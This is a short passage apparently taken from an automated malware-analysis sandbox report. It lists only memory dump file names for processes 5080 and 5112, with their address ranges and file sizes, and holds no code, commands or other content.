                                                                                                                                          6.9MB

                                                                                                                                        • memory/5080-579-0x0000000004E60000-0x0000000004E61000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4KB

                                                                                                                                        • memory/5080-597-0x0000000005130000-0x0000000005140000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          64KB

                                                                                                                                        • memory/5112-689-0x00007FF7263E0000-0x00007FF726EBD000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          10.9MB

                                                                                                                                        • memory/5112-695-0x000001C4463C0000-0x000001C446401000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          260KB

                                                                                                                                        • memory/5112-655-0x00007FF7263E0000-0x00007FF726EBD000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          10.9MB